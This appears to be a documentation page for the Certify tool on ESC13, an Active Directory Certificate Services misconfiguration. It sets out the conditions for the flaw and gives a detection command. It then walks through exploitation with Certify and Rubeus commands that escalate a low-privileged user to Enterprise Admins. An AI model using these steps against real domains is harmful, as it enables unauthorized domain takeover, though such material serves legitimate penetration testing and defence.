Skip to main content
ESC13 is a misconfiguration in Active Directory Certificate Services (AD CS), which stems from overly permissive enroll rights on special administrative certificate templates. Specifically, if a certificate template has been configured with an Issuance Policy that links to a domain group, then anyone who authenticates with a certificate issued from this template, will gain temporary membership into the linked domain group.
This is defined as Authentication Mechanism Assurance (AMA) by Microsoft.

Background

This configuration was first discovered by Adam Burford, and later tagged ESC13 by Jonas Bülow Knudsen in this blogpost.

Vulnerability Criteria

According to the research, the following criteria comprise an ESC13 vulnerability:
  • The enterprise CA grants enrollment rights to the attacker-controlled user.
    • Otherwise, the user would be unable to request any certificates from the CA.
  • The certificate template grants enrollment rights to the attacker-controlled user.
    • Otherwise, the user would be unable to request certificates based on the specific template.
  • The “manager approval” feature is disabled for the certificate template.
    • Otherwise, a “CA Manager” would have to manually review and approve the certificate request.
  • The “authorized signature” feature is disabled for the certificate template.
    • Otherwise, an enrollment agent would need to sign the certificate request on behalf of the requester.
  • The certificate template defines an Extended Key Usage (EKU) that enables client authentication.
    • Client Authentication (1.3.6.1.5.5.7.3.2)
    • PKINIT Client Authentication (1.3.6.1.5.2.3.4)
    • Smart Card Logon (1.3.6.1.4.1.311.20.2.2)
    • Any Purpose (2.5.29.37.0)
    • Subordinate CA (No EKUs)
  • The certificate template contains an issuance policy that links to an empty universal domain group.
    • Otherwise, we do not gain membership into the domain group when authenticating with the certificate.

Detection

We can search for certificate templates with these conditions using the enum-templates --filter-vulnerable command from Certify. For more information about the command and its parameters, please refer to the Command Overview page. 
Certify.exe enum-templates --filter-enabled --filter-vulnerable --hide-admins

Exploitation

Once we have identified a vulnerable certificate template that our attacker-controlled user can enroll in, we can evaluate if the issuance policy links to a group that is worth compromising. This includes checking what the group is a member of, and what access control permissions the group has across the environment. 
Get-ADGroup TemporaryAdmins -Properties MemberOf,Members
Since the TemporaryAdmins group is a member of the Enterprise Admins group, we deem that it is worth compromising, so we request a certificate from the template using the request command from Certify.
Certify.exe request --ca ca01.corp.local\CORP-CA01-CA --template TemporaryAdmin
Once the certificate has been issued, we simply pass it to Rubeus with the asktgt command using our low-privileged user. 
Rubeus.exe asktgt /user:lowpriv /certificate:MIACAQMwgAYJKoZIhvcNAQcBoIAkgASCA+gwgDCABgkqh... /ptt
Since the /ptt parameter was supplied to Rubeus when requesting the TGT, we should now have a ticket in our Kerberos ticket list that contains Enterprise Admins membership. We can verify this by attempting to execute whoami /all on a domain controller. 
Invoke-Command -ComputerName DC01 -ScriptBlock { whoami /all }